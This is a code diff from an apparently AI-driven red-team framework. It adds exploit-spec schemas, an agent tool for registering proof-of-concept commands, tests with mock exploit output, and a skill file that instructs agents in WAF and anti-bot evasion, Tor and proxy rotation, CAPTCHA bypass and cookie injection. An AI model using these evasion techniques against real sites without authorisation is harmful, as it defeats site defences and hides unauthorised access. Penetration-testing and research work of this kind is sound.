typing import Annotated, Literal, Union + +from pydantic import BaseModel, Field + + +class PortCheck(BaseModel): + kind: Literal["port"] = "port" + host: str + port: int + protocol: str = "tcp" # "tcp" or "udp" + + +class ServiceCheck(BaseModel): + kind: Literal["service"] = "service" + url: str + expected_status: int = 200 + body_pattern: str | None = None + + +class CredentialCheck(BaseModel): + kind: Literal["credential"] = "credential" + command: str + success_pattern: str + + +class CommandOutputCheck(BaseModel): + kind: Literal["command"] = "command" + command: str + pattern: str + expect_match: bool = True + + +class FileCheck(BaseModel): + kind: Literal["file"] = "file" + path: str + must_exist: bool = True + content_pattern: str | None = None + + +TargetCheck = Annotated[ + Union[PortCheck, ServiceCheck, CredentialCheck, CommandOutputCheck, FileCheck], + Field(discriminator="kind"), +] + + +class ExploitSpec(BaseModel): + finding_ref: str = Field(description="Finding reference, e.g. 
FIND-001") + poc_command: str = Field(description="Exact shell command reproducing the exploit") + success_patterns: list[str] = Field( + min_length=1, description="Regexes proving exploit succeeded" + ) + negative_command: str | None = Field(default=None, description="ZFP baseline command") + target_checks: list[TargetCheck] = Field(default_factory=list) + runs: int = Field(default=1, ge=1, le=10, description="Number of PoC runs for consensus") + min_success_rate: float = Field( + default=1.0, ge=0.0, le=1.0, description="Fraction of runs that must succeed" + ) + impact_patterns: list[str] = Field( + default_factory=list, + description="Regexes proving actual impact (data exfil, priv esc, RCE confirmation)", + ) + target_host: str | None = Field( + default=None, description="Primary target host — used for dedup fingerprint" + ) diff --git a/decepticon/tools/ad/bloodhound.py b/decepticon/tools/ad/bloodhound.py index 569bbd06..e1a57991 100644 --- a/decepticon/tools/ad/bloodhound.py +++ b/decepticon/tools/ad/bloodhound.py @@ -121,7 +121,12 @@ def _upsert_bh_object(graph: KnowledgeGraph, obj: dict[str, Any], type_name: str def _build_bh_index(graph: KnowledgeGraph) -> dict[str, Node]: """Build a bh_id → Node lookup for O(1) principal resolution.""" - return {n.props.get("bh_id"): n for n in graph.nodes.values() if n.props.get("bh_id")} + result: dict[str, Node] = {} + for n in graph.nodes.values(): + bh_id = n.props.get("bh_id") + if bh_id is not None: + result[str(bh_id)] = n + return result def _ingest_aces( diff --git a/decepticon/tools/interaction/complete_planning.py b/decepticon/tools/interaction/complete_planning.py index 3da090f6..38cceffd 100644 --- a/decepticon/tools/interaction/complete_planning.py +++ b/decepticon/tools/interaction/complete_planning.py @@ -13,7 +13,17 @@ from langchain_core.tools import InjectedToolCallId, tool from langgraph.config import get_stream_writer -from pydantic import Field +from pydantic import BeforeValidator, Field + + +def 
_sanitize_engagement_name(v: str) -> str: + """Coerce engagement_name to valid slug: strip, fallback, truncate.""" + if not isinstance(v, str): + return "unnamed-engagement" + v = v.strip() + if not v: + return "unnamed-engagement" + return v[:64] def _safe_writer(): @@ -27,6 +37,7 @@ def _safe_writer(): def complete_engagement_planning( engagement_name: Annotated[ str, + BeforeValidator(_sanitize_engagement_name), Field( min_length=1, max_length=64, diff --git a/decepticon/tools/research/exploit_spec_writer.py b/decepticon/tools/research/exploit_spec_writer.py new file mode 100644 index 00000000..edf8b4b1 --- /dev/null +++ b/decepticon/tools/research/exploit_spec_writer.py @@ -0,0 +1,70 @@ +"""LangChain tool for offensive agents to register machine-readable exploit specs.""" + +from __future__ import annotations + +import logging +from pathlib import Path + +from langchain_core.tools import tool + +from decepticon.schemas.exploit_spec import ExploitSpec + +log = logging.getLogger("decepticon.tools.research.exploit_spec_writer") + +_workspace: Path | None = None + + +def set_exploit_spec_workspace(workspace: Path) -> None: + """Inject the engagement workspace path for exploit_spec_register.""" + global _workspace + _workspace = workspace + + +@tool +def exploit_spec_register(spec_json: str) -> str: + """Register a machine-readable exploit spec for environment-grounded re-attack verification. + + Call this after writing FIND-NNN.md for a successful exploit. The spec enables + the EnvironmentVerifier to replay the exploit after defenses are applied, + producing a grounded RLVR reward signal without LLM judgment. + + Args: + spec_json: JSON string conforming to ExploitSpec schema. 
Required fields: + - finding_ref: "FIND-001" + - poc_command: exact shell command reproducing the exploit + - success_patterns: list of regexes proving exploit succeeded (min 1) + Optional: + - negative_command: ZFP baseline + - target_checks: list of PortCheck/ServiceCheck/CommandOutputCheck/etc. + """ + try: + spec = ExploitSpec.model_validate_json(spec_json) + except Exception as exc: + return f"ERROR: Invalid ExploitSpec JSON: {exc}" + + ws = _workspace + if ws is None: + return ( + "ERROR: exploit_spec_writer workspace not initialized " + "(call set_exploit_spec_workspace first)" + ) + + out_dir = ws / "findings" + out_dir.mkdir(parents=True, exist_ok=True) + path = out_dir / f"{spec.finding_ref}-exploit-spec.json" + try: + path.write_text(spec.model_dump_json(indent=2), encoding="utf-8") + except OSError as exc: + return f"ERROR: Could not write exploit spec: {exc}" + + log.info("Exploit spec registered for %s at %s", spec.finding_ref, path) + return ( + f"ExploitSpec registered for {spec.finding_ref}.\n" + f"File: {path}\n" + f"PoC command: {spec.poc_command[:120]}\n" + f"Success patterns: {len(spec.success_patterns)}\n" + f"Target checks: {len(spec.target_checks)}" + ) + + +EXPLOIT_SPEC_TOOLS = [exploit_spec_register] diff --git a/decepticon/tools/research/tools.py b/decepticon/tools/research/tools.py index 821dca4e..836334c0 100644 --- a/decepticon/tools/research/tools.py +++ b/decepticon/tools/research/tools.py @@ -213,7 +213,11 @@ def _iter_requirements(path: Path) -> list[tuple[str, str, str]]: def _iter_package_lock(path: Path) -> list[tuple[str, str, str]]: deps: list[tuple[str, str, str]] = [] - payload = json.loads(path.read_text(encoding="utf-8")) + try: + payload = json.loads(path.read_text(encoding="utf-8")) + except (FileNotFoundError, PermissionError, json.JSONDecodeError, OSError) as exc: + log.warning("Failed to parse package-lock.json %s: %s", path, exc) + return deps packages = payload.get("packages") if isinstance(packages, dict): @@ 
-1631,25 +1635,22 @@ def suggest_objectives_from_chains( highest = Severity.INFO for step in chain.steps: - step_mitre = step.node.props.get("mitre") - if isinstance(step_mitre, list): - mitre.extend([m for m in step_mitre if isinstance(m, str)]) - sev = _severity_from_string(step.node.props.get("severity")) + sev = _severity_from_string(step.node_kind) if sev in {Severity.CRITICAL, Severity.HIGH}: highest = sev phase = "initial-access" - if any(step.node.kind in {NodeKind.CREDENTIAL, NodeKind.SECRET} for step in chain.steps): + if any(step.node_kind in {NodeKind.CREDENTIAL, NodeKind.SECRET} for step in chain.steps): phase = "post-exploit" elif ( - "admin" in chain.crown_jewel.label.lower() - or "domain" in chain.crown_jewel.label.lower() + "admin" in chain.crown_jewel_label.lower() + or "domain" in chain.crown_jewel_label.lower() ): phase = "post-exploit" - title = f"Exploit chain {idx}: {chain.entrypoint.label} -> {chain.crown_jewel.label}" + title = f"Exploit chain {idx}: {chain.entrypoint_label} -> {chain.crown_jewel_label}" acceptance = [ - f"Demonstrate path from {chain.entrypoint.label} to {chain.crown_jewel.label}.", + f"Demonstrate path from {chain.entrypoint_label} to {chain.crown_jewel_label}.", "Capture evidence for each hop (commands, outputs, and impacted asset IDs).", "Validate the highest-risk step with PoC evidence or explain why blocked.", ] diff --git a/scripts/web-hotswap.sh b/scripts/web-hotswap.sh new file mode 100755 index 00000000..4614a19a --- /dev/null +++ b/scripts/web-hotswap.sh @@ -0,0 +1,139 @@ +#!/usr/bin/env bash +# web-hotswap.sh — Hot-swap web dashboard into running container +# +# Builds Next.js on the host, injects the output directly into the +# running decepticon-web container, then signals PID 1 (the entrypoint +# supervisor) to restart only the Next.js process. The terminal server +# stays alive — zero WebSocket disconnections for the operator. 
+# +# Usage: +# ./scripts/web-hotswap.sh # build + inject + reload +# ./scripts/web-hotswap.sh --skip-build # inject last build only +# ./scripts/web-hotswap.sh --full # build + inject + full container restart +# +# Speed: ~25s with build, ~5s inject-only +# Safety: terminal connections preserved (unless --full) + +set -euo pipefail + +REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)" +WEB_DIR="$REPO_ROOT/clients/web" +CONTAINER="decepticon-web" +STANDALONE="$WEB_DIR/.next/standalone/clients/web" + +RED='\033[0;31m' +GREEN='\033[0;32m' +YELLOW='\033[1;33m' +DIM='\033[2m' +NC='\033[0m' + +info() { echo -e "${GREEN}[hotswap]${NC} $*"; } +warn() { echo -e "${YELLOW}[hotswap]${NC} $*"; } +error() { echo -e "${RED}[hotswap]${NC} $*" >&2; } +dim() { echo -e "${DIM}[hotswap]${NC} $*"; } + +SKIP_BUILD=false +FULL_RESTART=false +for arg in "$@"; do + case "$arg" in + --skip-build) SKIP_BUILD=true ;; + --full) FULL_RESTART=true ;; + esac +done + +# Pre-flight +if ! docker inspect "$CONTAINER" --format '{{.State.Running}}' 2>/dev/null | grep -q true; then + error "$CONTAINER is not running" + exit 1 +fi + +START=$(date +%s) + +# ── Step 1: Build on host ───────────────────────────────────────── + +if [[ "$SKIP_BUILD" == false ]]; then + info "Building Next.js on host..." + cd "$WEB_DIR" + + DATABASE_URL="${DATABASE_URL:-postgresql://decepticon:decepticon@localhost:5432/decepticon_web}" \ + npx prisma generate --no-hints 2>&1 | tail -1 + + npm run build 2>&1 | tail -3 + + BUILD_END=$(date +%s) + info "Build completed in $((BUILD_END - START))s" +else + info "Skipping build (--skip-build)" + BUILD_END=$START + if [[ ! -d "$STANDALONE" ]]; then + error "No standalone build found — run without --skip-build first" + exit 1 + fi +fi + +# ── Step 2: Inject into container ───────────────────────────────── + +info "Injecting into $CONTAINER..." 
+ +# Remove old .next (as root — container user is nextjs) +docker exec -u 0 "$CONTAINER" rm -rf /app/clients/web/.next + +# Standalone .next via tar pipe +(cd "$STANDALONE" && tar cf - .next) | docker exec -u 0 -i "$CONTAINER" tar xf - -C /app/clients/web/ + +# Static assets (not in standalone) +(cd "$WEB_DIR" && tar cf - .next/static) | docker exec -u 0 -i "$CONTAINER" tar xf - -C /app/clients/web/ + +# Terminal server +docker cp "$WEB_DIR/server/terminal-server.ts" "$CONTAINER:/app/clients/web/server/terminal-server.ts" + +# server.js (standalone entry point) +docker cp "$STANDALONE/server.js" "$CONTAINER:/app/clients/web/server.js" + +# Fix ownership +docker exec -u 0 "$CONTAINER" chown -R nextjs:nodejs \ + /app/clients/web/.next \ + /app/clients/web/server.js \ + /app/clients/web/server/terminal-server.ts + +INJECT_END=$(date +%s) +dim "Inject completed in $((INJECT_END - BUILD_END))s" + +# ── Step 3: Reload ──────────────────────────────────────────────── + +if [[ "$FULL_RESTART" == true ]]; then + info "Full container restart (--full)..." + docker restart "$CONTAINER" >/dev/null 2>&1 + # Wait for healthy + for _ in $(seq 1 30); do + status=$(docker inspect "$CONTAINER" --format '{{.State.Health.Status}}' 2>/dev/null || echo "unknown") + [[ "$status" == "healthy" ]] && break + sleep 1 + done +else + # Signal PID 1 to restart only Next.js (terminal server stays alive) + info "Reloading Next.js (terminal stays connected)..." 
+ docker kill --signal=USR1 "$CONTAINER" >/dev/null 2>&1 || { + warn "SIGUSR1 failed — falling back to container restart" + docker restart "$CONTAINER" >/dev/null 2>&1 + } + # Wait for Next.js to come back up + for _ in $(seq 1 20); do + if curl -s -m 2 -o /dev/null http://localhost:3000/ 2>/dev/null; then + break + fi + sleep 1 + done +fi + +END=$(date +%s) + +# ── Verify ──────────────────────────────────────────────────────── + +HTTP_CODE=$(curl -s -m 5 -o /dev/null -w "%{http_code}" http://localhost:3000/ 2>/dev/null || echo "000") +if [[ "$HTTP_CODE" == "200" ]]; then + info "Done in $((END - START))s — http://localhost:3000 (HTTP $HTTP_CODE)" +else + error "Done in $((END - START))s but HTTP $HTTP_CODE — check: docker logs $CONTAINER" + exit 1 +fi diff --git a/skills/shared/stealth-infra/SKILL.md b/skills/shared/stealth-infra/SKILL.md new file mode 100644 index 00000000..0d087f44 --- /dev/null +++ b/skills/shared/stealth-infra/SKILL.md @@ -0,0 +1,334 @@ +--- +name: stealth-infra +description: "Anti-bot evasion, proxy rotation, credential retrieval from password managers, and stealth HTTP tooling for covert web operations." +allowed-tools: Bash Read +metadata: + subdomain: opsec + when_to_use: "stealth, anti-bot, captcha, Cloudflare bypass, WAF evasion, proxy rotation, cookie injection, password manager, keyring, 1Password, GNOME Keyring, OPSEC quiet, anti-detection, TLS fingerprint, browser impersonation" + tags: stealth, proxy, captcha, anti-bot, opsec, cookies, keyring + mitre_attack: T1562, T1036, T1090 +--- + +# Stealth Infrastructure — Anti-Bot Evasion & Covert Operations + +This skill covers the stealth tooling installed in the sandbox for evading anti-bot systems, rotating proxies, solving CAPTCHAs, and retrieving credentials from password managers. Use these tools when the engagement RoE specifies OPSEC level `quiet` or `silent`, or when targets deploy WAFs/anti-bot shields. 
+ +## Available Libraries (Pre-Installed) + +| Library | Purpose | When to use | +|---------|---------|-------------| +| **scrapling** | Adaptive scraping with Cloudflare Turnstile bypass, StealthyFetcher | Primary choice for any anti-bot-protected target | +| **curl_cffi** | libcurl with impersonated TLS fingerprints (Chrome/Firefox/Safari) | When you need raw HTTP with real browser TLS | +| **tls_client** | Go-based TLS fingerprint impersonation via Python | Alternative to curl_cffi for different fingerprint profiles | +| **cloudscraper** | Cloudflare v1/v2 challenge solver | Legacy Cloudflare JS challenges | +| **fake-useragent** | Realistic, rotating User-Agent strings | Any HTTP request needing normal-looking UA | +| **proxychains4** | Force any CLI tool through a SOCKS/HTTP proxy chain | Route nmap/curl/subfinder through Tor or proxy | +| **tor** | Onion routing for IP anonymization | When source IP must not be linkable to operator | +| **keyring** | OS keyring access (GNOME Keyring, macOS Keychain, Windows Credential Vault) | Retrieve stored credentials without hardcoding | +| **python-socks** | SOCKS4/5 proxy support for asyncio | Async HTTP through proxies | +| **aiohttp-socks** | aiohttp + SOCKS proxy integration | Async scraping through proxy chains | + +## 1. Scrapling — Primary Anti-Bot Bypass + +Scrapling's `StealthyFetcher` uses a real Chromium instance with anti-fingerprinting patches. It bypasses Cloudflare Turnstile, Akamai, DataDome, and most JS challenges. 
+ +```bash +# Stealthy fetch — bypasses Cloudflare Turnstile and most anti-bot checks +timeout 60 python3 -u -c ' +from scrapling.fetchers import StealthyFetcher + +page = StealthyFetcher.fetch( + "https://<target>", + headless=True, + network_idle=True, + disable_resources=True, # skip images/fonts for speed +) +print(f"Status: {page.status}") +print(f"Title: {page.css(\"title::text\").get()}") +# Extract data +for link in page.css("a[href]"): + print(f" {link.attrib[\"href\"]}") +' 2>&1 | tee scrapling_result.txt +``` + +### With proxy rotation: +```bash +timeout 60 python3 -u -c ' +from scrapling.fetchers import StealthyFetcher + +page = StealthyFetcher.fetch( + "https://<target>", + headless=True, + network_idle=True, + proxy={"server": "socks5://127.0.0.1:9050"}, # Tor +) +print(page.status, page.css("title::text").get()) +' +``` + +### Session persistence (cookies survive across requests): +```bash +timeout 60 python3 -u -c ' +from scrapling.fetchers import StealthyFetcher + +# First request — login +fetcher = StealthyFetcher() +page = fetcher.fetch("https://<target>/login", headless=True) +# Fill and submit login form... + +# Second request — authenticated, same session +page2 = fetcher.fetch("https://<target>/dashboard", headless=True) +print(page2.css("h1::text").get()) +' +``` + +## 2. curl_cffi — TLS Fingerprint Impersonation + +Real browser TLS fingerprints without running a browser. Fastest option for API probing.
+ +```bash +timeout 30 python3 -u -c ' +from curl_cffi import requests + +# Impersonate Chrome 131 +r = requests.get( + "https://<target>", + impersonate="chrome131", + timeout=10, +) +print(f"Status: {r.status_code}") +print(f"Server: {r.headers.get(\"server\", \"?\")} | CF-RAY: {r.headers.get(\"cf-ray\", \"none\")}") +print(r.text[:500]) +' +``` + +### With proxy: +```python +r = requests.get( + "https://<target>", + impersonate="chrome131", + proxies={"https": "socks5://127.0.0.1:9050"}, + timeout=10, +) +``` + +### Available impersonation profiles: +- `chrome99` through `chrome131` +- `firefox109`, `firefox133` +- `safari15_3`, `safari18_0` +- `edge99`, `edge101` + +## 3. Proxy Infrastructure + +### Proxychains (route any CLI tool through proxy) + +```bash +# Start Tor (if not running) +tor & +sleep 5 + +# Route curl through Tor +proxychains4 curl -s https://check.torproject.org/api/ip + +# Route any scanner through Tor +proxychains4 subfinder -d <domain> -silent +proxychains4 httpx-pd -l subdomains.txt -silent +``` + +### Free proxy rotation (Proxifly) + +```bash +# Download fresh proxy list +curl -sL https://cdn.jsdelivr.net/gh/proxifly/free-proxy-list@main/proxies/protocols/https/data.json -o proxies.json + +# Use in Python +timeout 30 python3 -u -c ' +import json, random +from curl_cffi import requests + +with open("proxies.json") as f: + proxies = json.load(f) + +# Pick a random proxy +proxy = random.choice(proxies) +proxy_url = f"{proxy[\"protocol\"]}://{proxy[\"ip\"]}:{proxy[\"port\"]}" +print(f"Using proxy: {proxy_url} ({proxy.get(\"country\", \"?\")})") + +r = requests.get( + "https://<target>", + impersonate="chrome131", + proxies={"https": proxy_url}, + timeout=10, +) +print(f"Status: {r.status_code}") +' +``` + +### Custom proxy chain (edit /etc/proxychains4.conf) + +```bash +# For OPSEC-quiet: chain through your VPN + Tor +cat > /tmp/chain.conf << 'EOF' +strict_chain +proxy_dns +[ProxyList] +socks5 <vpn-host> <vpn-port> +socks5 127.0.0.1 9050 +EOF +proxychains4 -f /tmp/chain.conf curl -s https://<target>
+``` + +## 4. Credential Retrieval from Password Managers + +### Python keyring (generic — works with GNOME Keyring, macOS Keychain, KWallet) + +```bash +timeout 10 python3 -u -c ' +import keyring + +# Retrieve stored credential +password = keyring.get_password("telenor-vdp", "test-user") +if password: + print(f"Retrieved password for test-user: {password[:3]}***") +else: + print("No credential stored. Use: keyring.set_password(\"telenor-vdp\", \"test-user\", \"<password>\")") +' +``` + +### Store credentials for the engagement: + +```bash +timeout 10 python3 -u -c ' +import keyring +keyring.set_password("telenor-vdp", "test-user", "<password>") +print("Credential stored in keyring") +' +``` + +### 1Password CLI (if configured): + +```bash +# Sign in (requires setup) +eval $(op signin) + +# Get a credential +op item get "Telenor VDP" --fields username,password --format=json +``` + +### Cookie injection from file: + +```bash +# Load cookies exported from the browser as JSON +timeout 30 python3 -u -c ' +import json +from curl_cffi import requests + +# Load cookies from JSON file (exported via browser extension) +with open("/workspace/cookies.json") as f: + cookie_data = json.load(f) + +# Build cookie jar +cookies = {} +for c in cookie_data: + cookies[c["name"]] = c["value"] + +r = requests.get( + "https://<target>/dashboard", + impersonate="chrome131", + cookies=cookies, + timeout=10, +) +print(f"Status: {r.status_code}") +print(r.text[:500]) +' +``` + +## 5. CAPTCHA Handling + +### Cloudflare Turnstile — Scrapling handles this automatically: +```python +# StealthyFetcher automatically solves Turnstile challenges +page = StealthyFetcher.fetch("https://<target>", headless=True, network_idle=True) +# If Turnstile was present, page.status will be 200 (solved) or 403 (failed) +``` + +### For other CAPTCHAs (reCAPTCHA, hCaptcha): +1. **Manual solve**: Use Scrapling's StealthyFetcher to render the page, screenshot, solve manually +2.
**Token injection**: If you have a CAPTCHA-solving service API key, inject the token: + +```bash +timeout 60 python3 -u -c ' +from curl_cffi import requests + +# After obtaining CAPTCHA token from a solving service: +CAPTCHA_TOKEN = "<captcha-token>" + +r = requests.post( + "https://<target>/login", + impersonate="chrome131", + data={ + "username": "test", + "password": "test", + "g-recaptcha-response": CAPTCHA_TOKEN, + }, + timeout=10, +) +print(r.status_code, r.headers.get("location", "")) +' +``` + +## 6. Rate Limiting & Traffic Shaping + +```bash +# Respectful rate-limited scraping +timeout 120 python3 -u -c ' +import time, random +from curl_cffi import requests +from fake_useragent import UserAgent + +ua = UserAgent() +TARGET = "https://<target>" +PATHS = ["/api/users", "/api/orders", "/api/settings"] + +for path in PATHS: + # Random delay: 2-5 seconds (mimics human) + time.sleep(random.uniform(2, 5)) + + r = requests.get( + f"{TARGET}{path}", + impersonate="chrome131", + headers={"User-Agent": ua.random}, + timeout=10, + ) + print(f"{r.status_code} {path}: {len(r.text)} bytes") +' +``` + +## Anti-Patterns (Do NOT) + +- **Never** send requests at machine speed without delays — even 100ms intervals look like a scanner +- **Never** use default `python-requests` User-Agent for stealth operations — it's fingerprinted by every WAF +- **Never** hardcode credentials in scripts — use keyring or env vars +- **Never** skip the WAF detection step — knowing what you face determines the right bypass +- **Never** use raw `requests.get()` against Cloudflare — it is typically blocked by fingerprinting; use curl_cffi or scrapling +- **Never** brute-force CAPTCHAs — solve or bypass them; repeated failures trigger IP bans + +## Decision Tree + +``` +Target has anti-bot? → Yes → Which type?
+ ├─ Cloudflare Turnstile → StealthyFetcher (automatic) + ├─ Cloudflare JS Challenge → cloudscraper or StealthyFetcher + ├─ Akamai/DataDome → StealthyFetcher with proxy rotation + ├─ reCAPTCHA/hCaptcha → Manual solve or token injection + └─ Custom WAF → curl_cffi with browser TLS fingerprint + +Target has rate limiting? → Yes + ├─ Soft (429 after N requests) → Add 2-5s random delays + └─ Hard (IP ban) → Rotate proxies via proxychains4 or Proxifly + +OPSEC level quiet/silent? + ├─ Use Tor for DNS + requests (proxychains4) + ├─ Rotate User-Agents (fake-useragent) + └─ Never reuse the same proxy for >10 requests +``` diff --git a/tests/unit/core/test_env_verifier.py b/tests/unit/core/test_env_verifier.py new file mode 100644 index 00000000..d16b58fd --- /dev/null +++ b/tests/unit/core/test_env_verifier.py @@ -0,0 +1,414 @@ +"""Unit tests for EnvironmentVerifier — environment-grounded vaccine verification.""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Awaitable, Callable + +import pytest + +from decepticon.core.env_verifier import EnvironmentVerifier +from decepticon.schemas.defense_brief import ReAttackOutcome +from decepticon.schemas.env_verification import ( + CheckPhase, + EnvironmentSnapshot, + PoCEvidence, + TargetCheckResult, + VerificationEvidence, +) +from decepticon.schemas.exploit_spec import ( + CommandOutputCheck, + ExploitSpec, +) + + +# ── Helpers ────────────────────────────────────────────────────────────────── + + +def make_runner( + poc_response: tuple[str, str, int] = ("PWNED root@target", "", 0), + negative_response: tuple[str, str, int] = ("clean", "", 0), + check_response: tuple[str, str, int] = ("matched", "", 0), +) -> Callable[[str], Awaitable[tuple[str, str, int]]]: + """Build a deterministic mock PoCRunner that branches on command shape.""" + + async def _run(command: str) -> tuple[str, str, int]: + if "PWNED" in command or "exploit" in command.lower(): + return poc_response + if 
"clean_request" in command or "noop" in command: + return negative_response + return check_response + + return _run + + +def make_spec( + finding_ref: str = "FIND-001", + success_patterns: list[str] | None = None, + negative_command: str | None = None, +) -> ExploitSpec: + return ExploitSpec( + finding_ref=finding_ref, + poc_command="curl -X POST exploit", + success_patterns=success_patterns or ["PWNED"], + negative_command=negative_command, + target_checks=[ + CommandOutputCheck( + command="echo matched", + pattern="matched", + expect_match=True, + ) + ], + ) + + +# ── Test 1: Pre-defense exploit succeeds → PASSED, reward 0.0 ────────────── + + +async def test_pre_defense_exploit_passed(tmp_path: Path) -> None: + runner = make_runner(poc_response=("PWNED root@target", "", 0)) + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec() + + pre = await verifier.capture_state(spec, phase=CheckPhase.PRE_DEFENSE) + # No POST snapshot pretend not yet defended; use pre as both + evidence = await verifier.verify_blocked(spec, pre=None, post=pre) + + assert evidence.re_attack_outcome == ReAttackOutcome.PASSED + assert "PWNED" in evidence.poc_evidence.success_signals_matched + reward = verifier.compute_reward(evidence) + assert reward.reward == 0.0 + assert reward.outcome == ReAttackOutcome.PASSED + + +# ── Test 2: Post-defense exploit fails → BLOCKED, reward 1.0 ─────────────── + + +async def test_post_defense_exploit_blocked(tmp_path: Path) -> None: + runner = make_runner(poc_response=("", "Permission denied", 1)) + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec() + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + + assert evidence.re_attack_outcome == ReAttackOutcome.BLOCKED + assert evidence.poc_evidence.success_signals_matched == [] + reward = verifier.compute_reward(evidence) + assert reward.reward == 1.0 + assert reward.outcome == 
ReAttackOutcome.BLOCKED + + +# ── Test 3: ZFP demotion → ERROR, reward 0.0 ─────────────────────────────── + + +async def test_zfp_demotion_errors(tmp_path: Path) -> None: + # Both PoC and negative control match success patterns — noise signal + async def _run(command: str) -> tuple[str, str, int]: + return ("PWNED everywhere", "", 0) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = make_spec(negative_command="curl noop") + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + + assert evidence.poc_evidence.zfp_demoted is True + assert evidence.re_attack_outcome == ReAttackOutcome.ERROR + reward = verifier.compute_reward(evidence) + assert reward.reward == 0.0 + assert reward.zfp_demoted is True + + +# ── Test 4: PARTIAL outcome → reward 0.5 ─────────────────────────────────── + + +async def test_partial_reward(tmp_path: Path) -> None: + runner = make_runner() + verifier = EnvironmentVerifier(tmp_path, runner) + pre = EnvironmentSnapshot( + finding_ref="FIND-002", + phase=CheckPhase.PRE_DEFENSE, + results=[ + TargetCheckResult( + check_id="FIND-002-pre_defense-0", + kind="command", + phase=CheckPhase.PRE_DEFENSE, + positive=True, + ), + TargetCheckResult( + check_id="FIND-002-pre_defense-1", + kind="command", + phase=CheckPhase.PRE_DEFENSE, + positive=True, + ), + ], + ) + post = EnvironmentSnapshot( + finding_ref="FIND-002", + phase=CheckPhase.POST_DEFENSE, + results=[ + TargetCheckResult( + check_id="FIND-002-post_defense-0", + kind="command", + phase=CheckPhase.POST_DEFENSE, + positive=False, + ), + TargetCheckResult( + check_id="FIND-002-post_defense-1", + kind="command", + phase=CheckPhase.POST_DEFENSE, + positive=True, + ), + ], + ) + evidence = VerificationEvidence( + finding_ref="FIND-002", + pre_snapshot=pre, + post_snapshot=post, + poc_evidence=PoCEvidence( + exit_code=0, + success_signals_matched=["PWNED"], + zfp_demoted=False, + output_hash="abc123", 
+ ), + re_attack_outcome=ReAttackOutcome.PARTIAL, + ) + reward = verifier.compute_reward(evidence) + assert reward.reward == 0.5 + assert reward.outcome == ReAttackOutcome.PARTIAL + assert reward.blocked_checks == 1 + assert reward.total_checks == 2 + + +# ── Test 5: persist_reward writes valid JSONL line ───────────────────────── + + +async def test_persist_reward_writes_jsonl(tmp_path: Path) -> None: + runner = make_runner(poc_response=("", "Permission denied", 1)) + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec() + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + reward = verifier.compute_reward(evidence) + verifier.persist_reward(reward) + + rewards_path = tmp_path / "rlvr" / "rewards.jsonl" + assert rewards_path.exists() + lines = rewards_path.read_text(encoding="utf-8").strip().splitlines() + assert len(lines) == 1 + parsed = json.loads(lines[0]) + assert parsed["finding_ref"] == "FIND-001" + assert parsed["reward"] == 1.0 + assert parsed["outcome"] == "blocked" + + # Append-only: second write produces a second line + verifier.persist_reward(reward) + lines2 = rewards_path.read_text(encoding="utf-8").strip().splitlines() + assert len(lines2) == 2 + json.loads(lines2[1]) # validates JSON + + +# ── Test 6: spec round-trip via load_spec ────────────────────────────────── + + +async def test_load_spec_roundtrip(tmp_path: Path) -> None: + runner = make_runner() + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec("FIND-077") + findings_dir = tmp_path / "findings" + findings_dir.mkdir(parents=True) + (findings_dir / "FIND-077-exploit-spec.json").write_text( + spec.model_dump_json(indent=2), encoding="utf-8" + ) + loaded = verifier.load_spec("FIND-077") + assert loaded is not None + assert loaded.finding_ref == "FIND-077" + assert loaded.success_patterns == ["PWNED"] + + +async def test_load_spec_missing_returns_none(tmp_path: 
Path) -> None: + runner = make_runner() + verifier = EnvironmentVerifier(tmp_path, runner) + assert verifier.load_spec("FIND-NONE") is None + + +# ── Test 7: persist_snapshot + persist_evidence write to disk ────────────── + + +async def test_persistence_writes_snapshot_and_evidence(tmp_path: Path) -> None: + runner = make_runner(poc_response=("", "blocked", 1)) + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec() + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + verifier.persist_snapshot(post) + snap_path = tmp_path / "verification" / "FIND-001-post_defense-snapshot.json" + assert snap_path.exists() + + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + verifier.persist_evidence(evidence) + evidence_path = tmp_path / "verification" / "FIND-001-evidence.json" + assert evidence_path.exists() + parsed = json.loads(evidence_path.read_text(encoding="utf-8")) + assert parsed["finding_ref"] == "FIND-001" + + +# ── Test 9: N-run consensus 1-of-3 partial when threshold strict ────────── + + +async def test_n_run_consensus_2_of_3_partial(tmp_path: Path) -> None: + """spec.runs=3, min_success_rate=1.0.
1/3 succeeds → success_rate < threshold → PARTIAL.""" + call_count = {"n": 0} + + async def _run(command: str) -> tuple[str, str, int]: + if "exploit" in command.lower() or "PWNED" in command: + call_count["n"] += 1 + if call_count["n"] == 1: + return ("PWNED root@target", "", 0) + return ("", "Permission denied", 1) + return ("matched", "", 0) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = ExploitSpec( + finding_ref="FIND-RUN3", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + runs=3, + min_success_rate=1.0, + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + + assert evidence.consensus is not None + assert evidence.consensus.n_runs == 3 + assert evidence.consensus.n_success == 1 + assert evidence.re_attack_outcome == ReAttackOutcome.PARTIAL + + +# ── Test 10: 2-of-3 with relaxed threshold + env unchanged → PASSED ─────── + + +async def test_n_run_consensus_2_of_3_blocked_when_threshold_met(tmp_path: Path) -> None: + """spec.runs=3, min_success_rate=0.5. 
